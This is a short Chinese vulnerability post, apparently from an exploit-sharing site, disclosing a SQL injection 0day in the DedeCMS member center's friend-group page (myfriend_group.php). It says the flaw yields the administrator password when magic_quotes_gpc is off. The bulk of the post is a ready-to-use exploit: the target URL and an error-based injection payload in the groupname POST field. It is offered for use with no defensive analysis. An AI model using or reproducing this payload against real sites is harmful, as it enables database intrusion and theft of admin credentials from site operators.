DedeCMS会员中心好友分组设置SQL注射0day漏洞

发布日期:2012-12-30
发布作者:c4rp3nt3r

漏洞类型:SQL注入

漏洞描述:需要magic_quotes_gpc = Off

DedeCMS会员中心好友分组设置SQL注射0day漏洞,成功利用该漏洞可获得管理员密码
都发出来吧,这种东西也算什么漏洞阿.其实对dedecms来说POST的数据同样可以GET提交,只是隐蔽点.

利用代码如下:

Exploit:

http://www.0day5.com/member/myfriend_group.php?dopost=add
POST
groupname=fffrrr’and @' and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((Select (version())),1,62)))a from information_schema.tables group by a)b) and ‘

原文链接:,转发请注明来源!

发表评论

要发表评论,您必须先登录